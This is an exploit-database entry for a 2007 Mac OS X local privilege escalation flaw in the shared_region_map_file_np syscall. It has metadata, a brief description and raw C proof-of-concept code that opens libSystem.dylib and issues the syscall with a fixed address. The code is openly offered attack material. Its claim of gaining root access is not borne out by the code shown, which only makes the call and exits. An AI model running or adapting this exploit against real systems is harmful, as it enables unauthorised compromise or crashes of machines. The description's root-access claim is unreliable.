Shared Region Map File NP Local Privilege Escalation Vulnerability

vendor:

Mac OS X

by:

Adriano Lima

7.5

CVSS

HIGH

Local Privilege Escalation

Unknown

CWE

Product Name: Mac OS X

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE: Unknown

Metasploit:

Other Scripts:

Platforms Tested:

2007

Shared Region Map File NP Local Privilege Escalation Vulnerability

This exploit takes advantage of a vulnerability in the shared_region_map_file_np function in Mac OS X. By opening the libSystem.dylib file and calling the shared_region_map_file_np syscall with a specific address, an attacker can escalate their privileges to gain root access.

Mitigation:

Unknown

Source

Exploit-DB raw data:

/*
This vulnerability was discovered by Adriano Lima
<adriano@risesecurity.org>.

REFERENCES

[1] Mac OS X Internals: A Systems Approach By Amit Singh

DISCLAIMER

The authors reserve the right not to be responsible for the topicality,
correctness, completeness or quality of the information provided in this
document. Liability claims regarding damage caused by the use of any
information
provided, including any kind of information which is incomplete or
incorrect,
will therefore be rejected.
*/


#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/syscall.h>
#include <unistd.h>

int main(int argc,char **argv){
   int fd;

   if((fd=open("/usr/lib/libSystem.dylib",O_RDONLY))==-1){
       perror("open");
       exit(EXIT_FAILURE);
   }

   if(syscall(SYS_shared_region_map_file_np,fd,0x02000000,NULL,NULL)==-1){
       perror("shared_region_map_file_np");
       exit(EXIT_FAILURE);
   }

   exit(EXIT_FAILURE);
}

// milw0rm.com [2007-01-21]